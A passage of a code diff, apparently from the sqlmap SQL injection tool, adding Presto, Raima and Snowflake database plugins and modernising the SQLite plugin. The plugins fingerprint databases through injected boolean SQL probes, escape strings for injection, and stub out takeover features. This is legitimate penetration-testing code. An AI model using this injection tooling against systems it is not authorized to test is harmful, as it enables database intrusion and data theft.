+= "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.PRESTO + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(PRESTO_ALIASES): + setDbms(DBMS.PRESTO) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.PRESTO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TO_BASE64URL(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.PRESTO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TO_HEX(FROM_HEX(NULL)) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.PRESTO + 
logger.warning(warnMsg) + + return False + + setDbms(DBMS.PRESTO) + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.PRESTO + logger.info(infoMsg) + + # Reference: https://prestodb.io/docs/current/release/release-0.200.html + if inject.checkBooleanExpression("FROM_IEEE754_32(NULL) IS NULL"): + Backend.setVersion(">= 0.200") + # Reference: https://prestodb.io/docs/current/release/release-0.193.html + elif inject.checkBooleanExpression("NORMAL_CDF(NULL,NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.193") + # Reference: https://prestodb.io/docs/current/release/release-0.183.html + elif inject.checkBooleanExpression("MAP_ENTRIES(NULL) IS NULL"): + Backend.setVersion(">= 0.183") + # Reference: https://prestodb.io/docs/current/release/release-0.171.html + elif inject.checkBooleanExpression("CODEPOINT(NULL) IS NULL"): + Backend.setVersion(">= 0.171") + # Reference: https://prestodb.io/docs/current/release/release-0.162.html + elif inject.checkBooleanExpression("XXHASH64(NULL) IS NULL"): + Backend.setVersion(">= 0.162") + # Reference: https://prestodb.io/docs/current/release/release-0.151.html + elif inject.checkBooleanExpression("COSINE_SIMILARITY(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.151") + # Reference: https://prestodb.io/docs/current/release/release-0.143.html + elif inject.checkBooleanExpression("TRUNCATE(NULL) IS NULL"): + Backend.setVersion(">= 0.143") + # Reference: https://prestodb.io/docs/current/release/release-0.137.html + elif inject.checkBooleanExpression("BIT_COUNT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.137") + # Reference: https://prestodb.io/docs/current/release/release-0.130.html + elif inject.checkBooleanExpression("MAP_CONCAT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.130") + # Reference: https://prestodb.io/docs/current/release/release-0.115.html + elif inject.checkBooleanExpression("SHA1(NULL) IS NULL"): + Backend.setVersion(">= 0.115") + # Reference: https://prestodb.io/docs/current/release/release-0.100.html + elif inject.checkBooleanExpression("SPLIT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.100") + # Reference: https://prestodb.io/docs/current/release/release-0.70.html + elif inject.checkBooleanExpression("GREATEST(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.70") + else: + Backend.setVersion("< 0.100") + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.PRESTO + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/presto/syntax.py b/plugins/dbms/presto/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/presto/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/presto/takeover.py b/plugins/dbms/presto/takeover.py new file mode 100644 index 00000000000..ab6233905d6 --- /dev/null +++ b/plugins/dbms/presto/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 
2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Presto it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Presto it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Presto it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Presto it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/__init__.py b/plugins/dbms/raima/__init__.py new file mode 100644 index 00000000000..ab55bcffd6c --- /dev/null +++ b/plugins/dbms/raima/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import RAIMA_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.raima.enumeration import Enumeration +from plugins.dbms.raima.filesystem import Filesystem +from plugins.dbms.raima.fingerprint import Fingerprint +from plugins.dbms.raima.syntax import Syntax +from plugins.dbms.raima.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class RaimaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Raima methods + """ + + def __init__(self): + self.excludeDbsList = RAIMA_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.RAIMA] = Syntax.escape diff --git a/plugins/dbms/raima/connector.py b/plugins/dbms/raima/connector.py new file mode 100644 index 00000000000..75e1c30f8fc --- /dev/null +++ b/plugins/dbms/raima/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Raima Database Manager it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/enumeration.py b/plugins/dbms/raima/enumeration.py new file mode 100644 index 00000000000..b0cbd38208a --- /dev/null +++ b/plugins/dbms/raima/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Raima Database Manager it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on Raima Database Manager it is not possible to get name 
of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Raima Database Manager it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Raima Database Manager it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def searchDb(self): + warnMsg = "on Raima Database Manager it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Raima Database Manager it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Raima Database Manager it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Raima Database Manager search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/raima/filesystem.py b/plugins/dbms/raima/filesystem.py new file mode 100644 index 00000000000..817d0e20ff6 --- /dev/null +++ b/plugins/dbms/raima/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Raima Database Manager it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Raima Database Manager it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/fingerprint.py b/plugins/dbms/raima/fingerprint.py new file mode 100644 index 00000000000..a62a674dedf --- /dev/null +++ b/plugins/dbms/raima/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import RAIMA_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.RAIMA) + + def getFingerprint(self): + value = "" + wsOsFp = 
Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.RAIMA + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(RAIMA_ALIASES): + setDbms(DBMS.RAIMA) + return True + + infoMsg = "testing %s" % DBMS.RAIMA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ROWNUMBER()=ROWNUMBER()") + + if result: + infoMsg = "confirming %s" % DBMS.RAIMA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("INSSTR('[RANDSTR1]',0,0,'[RANDSTR2]') IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA + logger.warning(warnMsg) + + return False + + setDbms(DBMS.RAIMA) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = ("%s%s" % (DBMS.RAIMA, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/raima/syntax.py b/plugins/dbms/raima/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/raima/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/raima/takeover.py b/plugins/dbms/raima/takeover.py new file mode 100644 index 00000000000..01bce20a13d --- /dev/null +++ b/plugins/dbms/raima/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Raima Database Manager it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Raima Database Manager it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Raima Database Manager it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Raima Database Manager it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) 
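Note on the constructor pattern used by the new plugin packages: the map classes touched or added in this patch (PostgreSQLMap and PrestoMap and RaimaMap above, SnowflakeMap below) drop the explicit per-mixin constructor calls in favour of a loop over the class's direct bases. A minimal standalone sketch of that idiom follows; the class names (DemoSyntax, DemoFingerprint, DemoMap) are illustrative only and are not sqlmap code.

    #!/usr/bin/env python

    # Illustrative sketch only (not sqlmap code): the cooperative __init__
    # idiom used by the *Map classes in this patch, where each direct base
    # is initialized by iterating over __class__.__bases__ instead of
    # calling every mixin constructor by name.

    class DemoSyntax(object):
        def __init__(self):
            self.quoteChar = "'"        # stand-in for per-DBMS syntax state

    class DemoFingerprint(object):
        def __init__(self):
            self.versionChecks = []     # stand-in for ordered version probes

    class DemoMap(DemoSyntax, DemoFingerprint):
        def __init__(self):
            # same idiom as the map classes in this patch
            for cls in self.__class__.__bases__:
                cls.__init__(self)

    if __name__ == "__main__":
        demo = DemoMap()
        print("%s %s" % (demo.quoteChar, demo.versionChecks))   # prints: ' []

The loop keeps the per-DBMS packages uniform: adding or removing a mixin from the class declaration no longer requires touching the constructor body.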
diff --git a/plugins/dbms/snowflake/__init__.py b/plugins/dbms/snowflake/__init__.py new file mode 100644 index 00000000000..c3318596441 --- /dev/null +++ b/plugins/dbms/snowflake/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import SNOWFLAKE_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.snowflake.enumeration import Enumeration +from plugins.dbms.snowflake.filesystem import Filesystem +from plugins.dbms.snowflake.fingerprint import Fingerprint +from plugins.dbms.snowflake.syntax import Syntax +from plugins.dbms.snowflake.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class SnowflakeMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Snowflake methods + """ + + def __init__(self): + self.excludeDbsList = SNOWFLAKE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.SNOWFLAKE] = Syntax.escape diff --git a/plugins/dbms/snowflake/connector.py b/plugins/dbms/snowflake/connector.py new file mode 100644 index 00000000000..c24f3ab17b6 --- /dev/null +++ b/plugins/dbms/snowflake/connector.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import snowflake.connector +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.convert import getText +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://www.snowflake.com/ + User guide: https://docs.snowflake.com/en/developer-guide/python-connector/python-connector + API: https://docs.snowflake.com/en/developer-guide/python-connector/python-connector-api + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + + try: + self.connector = snowflake.connector.connect( + user=self.user, + password=self.password, + account=self.account, + warehouse=self.warehouse, + database=self.db, + schema=self.schema + ) + cursor = self.connector.cursor() + cursor.execute("SELECT CURRENT_VERSION()") + cursor.close() + + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARNING if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(getText(query)) + except Exception as ex: + logger.log(logging.WARNING if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/snowflake/enumeration.py b/plugins/dbms/snowflake/enumeration.py new file mode 100644 index 00000000000..c742a6960c9 --- /dev/null +++ b/plugins/dbms/snowflake/enumeration.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import 
logger +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Snowflake it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Snowflake it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def searchDb(self): + warnMsg = "on Snowflake it is not possible to search databases" + logger.warning(warnMsg) + return [] + + def searchColumn(self): + errMsg = "on Snowflake it is not possible to search columns" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/snowflake/filesystem.py b/plugins/dbms/snowflake/filesystem.py new file mode 100644 index 00000000000..23ba254b08b --- /dev/null +++ b/plugins/dbms/snowflake/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Snowflake it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Snowflake it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/snowflake/fingerprint.py b/plugins/dbms/snowflake/fingerprint.py new file mode 100644 index 00000000000..512e7427e4c --- /dev/null +++ b/plugins/dbms/snowflake/fingerprint.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import SNOWFLAKE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.SNOWFLAKE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.SNOWFLAKE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + """ + References for fingerprint: + + * https://docs.snowflake.com/en/sql-reference/functions/current_warehouse + * https://docs.snowflake.com/en/sql-reference/functions/md5_number_upper64 + """ + + if not 
conf.extensiveFp and Backend.isDbmsWithin(SNOWFLAKE_ALIASES): + setDbms("%s %s" % (DBMS.SNOWFLAKE, Backend.getVersion())) + self.getBanner() + return True + + infoMsg = "testing %s" % DBMS.SNOWFLAKE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CURRENT_WAREHOUSE()=CURRENT_WAREHOUSE()") + if result: + infoMsg = "confirming %s" % DBMS.SNOWFLAKE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("MD5_NUMBER_UPPER64('[RANDSTR]')=MD5_NUMBER_UPPER64('[RANDSTR]')") + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.SNOWFLAKE + logger.warning(warnMsg) + return False + + setDbms(DBMS.SNOWFLAKE) + self.getBanner() + return True + + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.SNOWFLAKE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/snowflake/syntax.py b/plugins/dbms/snowflake/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/snowflake/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/snowflake/takeover.py b/plugins/dbms/snowflake/takeover.py new file mode 100644 index 00000000000..0acd82169f0 --- /dev/null +++ b/plugins/dbms/snowflake/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Snowflake it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Snowflake it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Snowflake it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Snowflake it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index c71ff98760f..cb8703b7a6f 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = SQLITE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - 
Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.SQLITE] = Syntax.escape diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index 7352cc733ce..0b167273df1 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,25 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import sqlite3 -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector - class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite @@ -46,9 +46,9 @@ def connect(self): cursor.execute("SELECT * FROM sqlite_master") cursor.close() - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: + except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError): warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" - logger.warn(warnMsg) + logger.warning(warnMsg) try: try: @@ -60,26 +60,26 @@ def connect(self): self.__sqlite = sqlite self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - raise SqlmapConnectionException(msg[0]) + except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) + except self.__sqlite.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): try: - self.cursor.execute(utf8encode(query)) - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - except self.__sqlite.DatabaseError, msg: - raise SqlmapConnectionException(msg[0]) + self.cursor.execute(getText(query)) + except self.__sqlite.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + except self.__sqlite.DatabaseError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index a5509c5643c..18df65145e8 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -10,48 +10,47 @@ from 
plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getCurrentUser(self): warnMsg = "on SQLite it is not possible to enumerate the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) def getCurrentDb(self): warnMsg = "on SQLite it is not possible to get name of the current database" - logger.warn(warnMsg) + logger.warning(warnMsg) - def isDba(self): + def isDba(self, user=None): warnMsg = "on SQLite the current user has all privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) + + return True def getUsers(self): warnMsg = "on SQLite it is not possible to enumerate the users" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on SQLite it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on SQLite it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def getDbs(self): warnMsg = "on SQLite it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def searchDb(self): warnMsg = "on SQLite it is not possible to search databases" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] @@ -61,4 +60,10 @@ def searchColumn(self): def getHostname(self): warnMsg = "on SQLite it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on SQLite it is not possible to enumerate the SQL statements" + 